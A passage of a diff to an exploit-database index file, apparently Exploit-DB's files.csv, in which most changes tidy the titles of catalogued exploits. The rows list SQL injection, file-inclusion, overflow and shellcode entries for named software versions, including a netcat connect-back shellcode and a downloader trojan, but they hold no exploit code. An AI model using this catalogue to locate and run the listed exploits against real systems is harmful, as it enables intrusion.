12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0 12655,platforms/windows/dos/12655.txt,"QtWeb Browser 3.3 - DoS",2010-05-18,PoisonCode,windows,dos,0 12656,platforms/php/webapps/12656.txt,"Battle Scrypt Shell Upload",2010-05-19,DigitALL,php,webapps,0 @@ -11558,14 +11558,14 @@ id,file,description,date,author,platform,type,port 12671,platforms/php/webapps/12671.txt,"Powder Blue Design SQL Injection",2010-05-20,cyberlog,php,webapps,0 12672,platforms/asp/webapps/12672.txt,"Spaw Editor 1.0 & 2.0 - Remote File Upload",2010-05-20,Ma3sTr0-Dz,asp,webapps,0 12673,platforms/windows/remote/12673.txt,"ComponentOne VSFlexGrid 7 & 8 - 'Archive()' method Remote Buffer Overflow Exploit",2010-05-20,Ma3sTr0-Dz,windows,remote,0 -12674,platforms/php/webapps/12674.txt,"webYourPhotos <= 6.05 - (index.php) Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 +12674,platforms/php/webapps/12674.txt,"webYourPhotos 6.05 - (index.php) Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 30093,platforms/linux/local/30093.txt,"Mutt 1.4.2 Mutt_Gecos_Name Function Local Buffer Overflow",2007-05-28,raylai,linux,local,0 14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps,0 12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 admin/editconfig.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Include Vulnerabilities",2006-06-17,"M.Hasran Addahroni",php,webapps,0 -28048,platforms/php/webapps/28048.txt,"RahnemaCo Page.php PageID Remote File Include",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 +28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusion Vulnerabilities",2006-06-17,"M.Hasran Addahroni",php,webapps,0 +28048,platforms/php/webapps/28048.txt,"RahnemaCo Page.php PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 28049,platforms/windows/dos/28049.html,"GreenBrowser 6.4.0515 - Heap Overflow",2013-09-03,Asesino04,windows,dos,0 28050,platforms/windows/dos/28050.txt,"Oracle Java lookUpByteBI - Heap Buffer Overflow",2013-09-03,GuHe,windows,dos,0 28051,platforms/windows/dos/28051.py,"PotPlayer 1.5.39036 - (.wav) Crash PoC",2013-09-03,ariarat,windows,dos,0 @@ -11576,7 +11576,7 @@ id,file,description,date,author,platform,type,port 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0 12686,platforms/php/webapps/12686.txt,"Online University (Auth Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0 -12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 +12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - (gallery.php) Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 administration console - Cross-Site Scripting (XSS) (Authenticated)",2010-05-21,"Richard Brain",multiple,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 @@ -11597,7 +11597,7 @@ id,file,description,date,author,platform,type,port 12706,platforms/php/webapps/12706.txt,"MMA Creative Design SQL Injection",2010-05-23,XroGuE,php,webapps,0 12707,platforms/php/webapps/12707.txt,"runt-communications Design SQL Injection",2010-05-23,XroGuE,php,webapps,0 12709,platforms/php/webapps/12709.txt,"webperformance Ecommerce SQL",2010-05-23,cyberlog,php,webapps,0 -12710,platforms/windows/local/12710.c,"Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609 (2010.5.23) - Kernel Mode Local Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 +12710,platforms/windows/local/12710.c,"Kingsoft WebShield KAVSafe.sys 2010.4.14.609 (2010.5.23) - Kernel Mode Local Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 12711,platforms/php/webapps/12711.txt,"BBMedia Design's SQL Injection",2010-05-23,XroGuE,php,webapps,0 12712,platforms/php/webapps/12712.txt,"goffgrafix Design's SQL Injection",2010-05-23,XroGuE,php,webapps,0 12713,platforms/php/webapps/12713.txt,"eCreo SQL Injection",2010-05-23,cyberlog,php,webapps,0 @@ -11606,14 +11606,14 @@ id,file,description,date,author,platform,type,port 12716,platforms/php/webapps/12716.txt,"runt-communications Design (property_more.php) SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12717,platforms/php/webapps/12717.txt,"Telia Web Design (index.php) SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12718,platforms/php/webapps/12718.txt,"BBMedia Design's (news_more.php) SQL Injection",2010-05-24,gendenk,php,webapps,0 -12719,platforms/php/webapps/12719.txt,"PHP Graphy <= 0.9.7 - (index.php) Remote Command Execution",2010-05-24,"Sn!pEr.S!Te Hacker",php,webapps,0 +12719,platforms/php/webapps/12719.txt,"PHP Graphy 0.9.7 - (index.php) Remote Command Execution",2010-05-24,"Sn!pEr.S!Te Hacker",php,webapps,0 12720,platforms/php/webapps/12720.txt,"Schaf-CMS 1.0 - SQL Injection",2010-05-24,Manas58,php,webapps,0 12721,platforms/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,php,webapps,0 12722,platforms/php/webapps/12722.txt,"interuse Website Builder & design (index2.php) SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12723,platforms/php/webapps/12723.py,"Joomla com_qpersonel SQL Injection Remote Exploit",2010-05-24,"Valentin Hoebel",php,webapps,0 12724,platforms/php/webapps/12724.php,"WebAsys blindSQL-inj Exploit",2010-05-24,zsh.shell,php,webapps,0 12725,platforms/php/webapps/12725.txt,"ALSCO CMS SQL Injection Vulnerabilities",2010-05-24,PrinceofHacking,php,webapps,0 -12726,platforms/php/webapps/12726.txt,"REvolution <= 10.02 - CSRF (Cross-Site Request Forgery)",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +12726,platforms/php/webapps/12726.txt,"REvolution 10.02 - CSRF (Cross-Site Request Forgery)",2010-05-24,"High-Tech Bridge SA",php,webapps,0 12727,platforms/php/webapps/12727.txt,"LiSK CMS 4.4 - SQL Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 12728,platforms/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure",2010-05-24,"Praveen Darshanam",windows,webapps,0 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 @@ -11641,7 +11641,7 @@ id,file,description,date,author,platform,type,port 12761,platforms/php/webapps/12761.txt,"GlobalWebTek Design SQL Injection",2010-05-27,cyberlog,php,webapps,0 12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 12763,platforms/php/webapps/12763.txt,"Script Upload Up Your Shell (Sql Inject)",2010-05-27,MouDy-Dz,php,webapps,0 -12766,platforms/php/webapps/12766.txt,"PPhlogger <= 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 +12766,platforms/php/webapps/12766.txt,"PPhlogger 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0 @@ -11651,7 +11651,7 @@ id,file,description,date,author,platform,type,port 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection",2010-05-27,cyberlog,php,webapps,0 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0 12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 - (build 144) Denial of Service Exploit",2010-05-28,Dr_IDE,windows,dos,0 -12775,platforms/multiple/dos/12775.py,"VLC Media Player <= 1.0.6 - (.avi) Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0 +12775,platforms/multiple/dos/12775.py,"VLC Media Player 1.0.6 - (.avi) Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent (news.php) SQL Injection",2010-05-28,v3n0m,php,webapps,0 12779,platforms/php/webapps/12779.txt,"Joomla Component My Car - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0 @@ -11659,7 +11659,7 @@ id,file,description,date,author,platform,type,port 12781,platforms/php/webapps/12781.txt,"Joomla Component com_jepoll (pollid) SQL Injection",2010-05-28,v3n0m,php,webapps,0 12782,platforms/php/webapps/12782.txt,"Joomla Component com_jejob 1.0 - (catid) SQL Injection",2010-05-28,v3n0m,php,webapps,0 12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0 -12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - Remote SQL Injection",2010-05-29,Shamus,windows,webapps,0 +12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0 12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery - RFI / SQLi",2010-05-29,AntiSecurity,php,webapps,0 12788,platforms/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps,0 @@ -11672,7 +11672,7 @@ id,file,description,date,author,platform,type,port 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0 12801,platforms/php/webapps/12801.txt,"Oscommerce Online Merchant 2.2 - File Disclosure And Admin ByPass",2010-05-30,Flyff666,php,webapps,0 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 -12804,platforms/multiple/remote/12804.txt,"nginx http server <= 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0 +12804,platforms/multiple/remote/12804.txt,"nginx http server 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12806,platforms/php/webapps/12806.txt,"CMScout - (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12807,platforms/php/webapps/12807.txt,"Creato Script SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 @@ -11687,13 +11687,13 @@ id,file,description,date,author,platform,type,port 12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0 12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - (RFI/XSS) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0 12819,platforms/php/webapps/12819.txt,"Persian E107 - XSS",2010-05-31,indoushka,php,webapps,0 -12820,platforms/php/webapps/12820.txt,"Visitor Logger (banned.php) Remote File Include",2010-05-31,bd0rk,php,webapps,0 +12820,platforms/php/webapps/12820.txt,"Visitor Logger (banned.php) Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0 12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0 12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs SQL Injection",2010-05-31,d0lc3,php,webapps,0 12823,platforms/php/webapps/12823.txt,"musicbox SQL Injection",2010-05-31,titanichacker,php,webapps,0 -12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) Local SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0 +12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0 12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0 -12839,platforms/php/webapps/12839.txt,"Hexjector <= 1.0.7.2 - Persistent XSS",2010-06-01,hexon,php,webapps,0 +12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent XSS",2010-06-01,hexon,php,webapps,0 12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret (SQL Injection)",2010-06-01,Neuromancer,asp,webapps,0 12842,platforms/php/webapps/12842.txt,"Joomla Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0 @@ -11704,7 +11704,7 @@ id,file,description,date,author,platform,type,port 12850,platforms/php/webapps/12850.txt,"Member ID The Fish Index PHP SQL Injection",2010-06-03,v4lc0m87,php,webapps,0 12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,dos,0 12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0 -12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - RFI",2010-06-03,Sid3^effects,php,webapps,0 +12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - Remote File Inclusion",2010-06-03,Sid3^effects,php,webapps,0 12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 - (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities (2)",2010-06-03,indoushka,php,webapps,0 12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 Reinstall",2010-06-03,indoushka,php,webapps,0 @@ -12103,14 +12103,14 @@ id,file,description,date,author,platform,type,port 13741,platforms/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 -15498,platforms/multiple/dos/15498.html,"Mozilla Firefox <= 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 +15498,platforms/multiple/dos/15498.html,"Mozilla Firefox 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow Exploit (SEH)",2010-11-12,Dr_IDE,windows,local,0 13744,platforms/php/webapps/13744.txt,"RTRandomImage Remote File Inclusion",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0 13745,platforms/php/webapps/13745.txt,"Sphider Script Remote Code Execution",2010-06-06,XroGuE,php,webapps,0 13746,platforms/php/webapps/13746.txt,"Joomla Component com_searchlog SQL Injection",2010-06-06,d0lc3,php,webapps,0 13747,platforms/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 13748,platforms/php/webapps/13748.txt,"Joomla Component com_annonces Upload",2010-06-06,Sid3^effects,php,webapps,0 -13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 SQLi",2010-06-06,Sid3^effects,php,webapps,0 +13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQLi",2010-06-06,Sid3^effects,php,webapps,0 13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System LFI",2010-06-06,AntiSecurity,php,webapps,0 13751,platforms/php/webapps/13751.txt,"greeting card Remote Upload",2010-06-06,Mr.Benladen,php,webapps,0 13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection and XSS",2010-06-06,Sid3^effects,php,webapps,0 @@ -12125,7 +12125,7 @@ id,file,description,date,author,platform,type,port 13768,platforms/php/local/13768.py,"Castripper 2.50.70 - (.pls) Stack Buffer Overflow DEP bypass Exploit",2010-06-08,mr_me,php,local,0 13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQLI",2010-06-08,Sid3^effects,php,webapps,0 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System",2010-06-08,"L0rd CrusAd3r",php,webapps,0 -13771,platforms/php/webapps/13771.txt,"EMO Realty Manager SQLi Vulnerable",2010-06-08,"L0rd CrusAd3r",php,webapps,0 +13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQLi Vulnerable",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13772,platforms/php/webapps/13772.txt,"Rayzz Photoz Upload",2010-06-08,Sid3^effects,php,webapps,0 13773,platforms/php/webapps/13773.txt,"Holiday Travel Portal Upload",2010-06-08,Sid3^effects,php,webapps,0 13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC",2010-06-08,"Dillon Beresford",hardware,dos,80 @@ -12138,18 +12138,18 @@ id,file,description,date,author,platform,type,port 13782,platforms/php/webapps/13782.txt,"Image Store Remote file Upload",2010-06-08,Mr.FireStormm,php,webapps,0 13783,platforms/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS Haunted House Directory Listing SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 -13785,platforms/php/webapps/13785.txt,"eLms Pro SQLi and XSS",2010-06-09,Sid3^effects,php,webapps,0 -13786,platforms/php/webapps/13786.txt,"PGAUTOPro SQLi and XSS",2010-06-09,Sid3^effects,php,webapps,0 +13785,platforms/php/webapps/13785.txt,"eLms Pro - SQLi and XSS",2010-06-09,Sid3^effects,php,webapps,0 +13786,platforms/php/webapps/13786.txt,"PGAUTOPro - SQLi and XSS",2010-06-09,Sid3^effects,php,webapps,0 13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Exploit PoC (0Day)",2010-06-09,Unknown,multiple,remote,0 -13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 SQLi",2010-06-09,Sid3^effects,asp,webapps,0 +13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 - SQLi",2010-06-09,Sid3^effects,asp,webapps,0 13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQLi",2010-06-09,Sid3^effects,asp,webapps,0 14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,php,webapps,0 13790,platforms/asp/webapps/13790.txt,"iClone SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0 14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple CSRF Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - netcat connect back port 8080 shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 13792,platforms/php/webapps/13792.txt,"Joomla component cinema SQL Injection",2010-06-09,Sudden_death,php,webapps,0 -13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager SQLi",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 -13794,platforms/multiple/webapps/13794.txt,"Joomla 1.5 Jreservation Component SQLi And XSS",2010-06-09,Sid3^effects,multiple,webapps,0 +13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQLi",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 +13794,platforms/multiple/webapps/13794.txt,"Joomla 1.5 Jreservation Component - SQLi And XSS",2010-06-09,Sid3^effects,multiple,webapps,0 27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk Arbitrary File Upload and Script Execution",2006-06-05,Kil13r,php,webapps,0 27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 @@ -12159,10 +12159,10 @@ id,file,description,date,author,platform,type,port 13799,platforms/php/webapps/13799.txt,"joomla com_jmarket SQLi",2010-06-09,Sid3^effects,php,webapps,0 13800,platforms/php/webapps/13800.txt,"joomla com_jsubscription SQLi",2010-06-09,Sid3^effects,php,webapps,0 13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQLi & XSS",2010-06-09,"L0rd CrusAd3r",php,webapps,0 -13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script SQLi",2010-06-09,"L0rd CrusAd3r",php,webapps,0 -13803,platforms/php/webapps/13803.txt,"PHPAccess SQLi",2010-06-09,"L0rd CrusAd3r",php,webapps,0 -13804,platforms/php/webapps/13804.txt,"joomla com_jnewsletter SQLi",2010-06-09,Sid3^effects,php,webapps,0 -13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script SQLi & XSS",2010-06-09,"L0rd CrusAd3r",php,webapps,0 +13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script - SQLi",2010-06-09,"L0rd CrusAd3r",php,webapps,0 +13803,platforms/php/webapps/13803.txt,"PHPAccess - SQLi",2010-06-09,"L0rd CrusAd3r",php,webapps,0 +13804,platforms/php/webapps/13804.txt,"joomla com_jnewsletter - SQLi",2010-06-09,Sid3^effects,php,webapps,0 +13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQLi & XSS",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0 13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0 13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0 @@ -12170,13 +12170,13 @@ id,file,description,date,author,platform,type,port 13812,platforms/php/webapps/13812.txt,"SchoolMation 2.3 - SQLi and XSS",2010-06-10,Sid3^effects,php,webapps,0 13813,platforms/php/webapps/13813.html,"Store Locator Remote Add Admin Exploit CSRF",2010-06-10,JaMbA,php,webapps,0 13814,platforms/asp/webapps/13814.txt,"Pars Design CMS Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 -13815,platforms/asp/webapps/13815.pl,"Netvolution CMS <= 2.x SQL Injection Exploit Script",2010-06-10,"amquen and krumel",asp,webapps,0 +13815,platforms/asp/webapps/13815.pl,"Netvolution CMS 2.x SQL Injection Exploit Script",2010-06-10,"amquen and krumel",asp,webapps,0 13816,platforms/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection",2010-06-10,"L0rd CrusAd3r",php,webapps,0 13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 INDD File Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure and DoS Vulnerabilities",2010-06-11,Dr_IDE,windows,remote,0 13819,platforms/php/webapps/13819.txt,"E-PHP B2B Marketplace - Multiple Vulnerabilities",2010-06-11,MizoZ,php,webapps,0 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0 -13822,platforms/windows/remote/13822.txt,"Nginx <= 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0 +13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0 13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - (Mobile Office Suite) XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 @@ -12204,7 +12204,7 @@ id,file,description,date,author,platform,type,port 13848,platforms/php/webapps/13848.txt,"Infront SQL Injection",2010-06-12,TheMaStEr,php,webapps,0 13849,platforms/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,php,webapps,0 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies Web Server Remote Poison null byte Exploit",2010-06-13,kingcope,multiple,remote,80 -13852,platforms/php/webapps/13852.txt,"phpplanner <= PHP Planner 0.4 - Multiple Vulnerabilities",2010-06-13,"cp77fk4r ",php,webapps,0 +13852,platforms/php/webapps/13852.txt,"phpplanner PHP Planner 0.4 - Multiple Vulnerabilities",2010-06-13,"cp77fk4r ",php,webapps,0 13853,platforms/linux/remote/13853.pl,"Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 13854,platforms/php/webapps/13854.txt,"UTStats - XSS & SQL Injection & Full path disclosure",2010-06-13,"LuM Member",php,webapps,0 13855,platforms/php/webapps/13855.txt,"Eyeland Studio Inc. SQL Injection",2010-06-13,Mr.P3rfekT,php,webapps,0 @@ -12243,7 +12243,7 @@ id,file,description,date,author,platform,type,port 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0 13897,platforms/php/webapps/13897.txt,"Real Estate SQL Injection",2010-06-16,"L0rd CrusAd3r",php,webapps,0 13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0 -13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Include",2010-06-17,sh00t0ut,php,webapps,0 +13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Inclusion",2010-06-17,sh00t0ut,php,webapps,0 13900,platforms/php/webapps/13900.txt,"Easy Travel Portal SQl Vulnerable",2010-06-17,"L0rd CrusAd3r",php,webapps,0 13901,platforms/php/webapps/13901.txt,"PenPals Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0 13902,platforms/asp/webapps/13902.txt,"Ananda Image Gallery SQL",2010-06-17,"L0rd CrusAd3r",asp,webapps,0 @@ -12253,10 +12253,10 @@ id,file,description,date,author,platform,type,port 13906,platforms/novell/dos/13906.txt,"Netware SMB Remote Stack Overflow PoC",2010-06-17,"laurent gaffie",novell,dos,139 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local BoF Exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 -13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition <= 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 +13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 13910,platforms/lin_x86/shellcode/13910.c,"Linux/x86 - Polymorphic Bindport 31337 with setreuid (0_0) shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode,0 13911,platforms/php/webapps/13911.txt,"Live CMS SQL Injection",2010-06-17,ahwak2000,php,webapps,0 -13912,platforms/php/webapps/13912.txt,"Havij <= 1.10 - Persistent XSS",2010-06-17,hexon,php,webapps,0 +13912,platforms/php/webapps/13912.txt,"Havij 1.10 - Persistent 